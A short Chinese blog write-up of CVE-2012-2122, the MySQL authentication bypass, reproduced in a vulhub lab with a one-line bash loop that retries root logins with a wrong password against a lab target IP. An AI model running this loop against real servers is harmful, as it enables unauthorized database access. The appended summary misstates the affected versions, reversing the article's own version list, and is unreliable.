mysql身份验证绕过漏洞
受影响版本
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
注:只能在特定编译环境下进行,即编译MySQL的时候加了-fno-builtin,并且所使用的glibc是经SSE优化后的(一般系统自带的都是如此)。
出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值,在某些平台上进行了优化,导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。大约256次就可以成功一次。具体也没理解清楚。可以看看下面的网址。
参考:https://vulhub.org/#/environments/mysql/CVE-2012-2122/ https://www.freebuf.com/vuls/3815.html
https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/
https://www.freebuf.com/vuls/3815.html
复现
我用vulhub搭建了环境
攻击机:kali :192.168.34.80
靶机:ubuntu18:192.168.34.182
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.34.182 -P3306 ; done

本文详细介绍了在特定编译环境下,MySQL存在一个身份验证绕过漏洞(CVE-2012-2122),此漏洞允许攻击者在约256次尝试中成功一次地绕过密码验证。受影响的MySQL版本包括从5.1.63, 5.5.24, 和5.6.6开始的版本。文章提供了漏洞的复现步骤,包括使用kali和ubuntu搭建攻击和靶机环境。
3133

被折叠的 条评论
为什么被折叠?



